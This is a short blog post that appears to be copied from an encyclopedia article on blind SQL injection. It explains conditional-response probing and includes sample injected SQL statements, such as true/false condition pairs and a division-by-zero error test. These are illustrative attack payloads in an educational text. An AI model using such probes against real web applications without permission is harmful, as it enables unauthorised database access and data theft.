Blind SQL Injection is used when a web application is vulnerable to
an SQL injection but the results of the injection are not visible to the
attacker. The page with the vulnerability may not be one that displays
data but will display differently depending on the results of a logical
statement injected into the legitimate SQL statement called for that
page. This type of attack can become time-intensive because a new
statement must be crafted for each bit recovered. There are several
tools that can automate these attacks once the location of the
vulnerability and the target information has been established.
[11]
[edit] Conditional responses
One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen.
SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to a
SQL injection. An injection like this may suggest to the attacker that a
blind SQL injection is possible, leaving the attacker to devise
statements that evaluate to true or false depending on the contents of
another column or table outside of the SELECT statement's column list.
[12]
SELECT 1/0 FROM users WHERE username='ooo';
0 komentar:
Post a Comment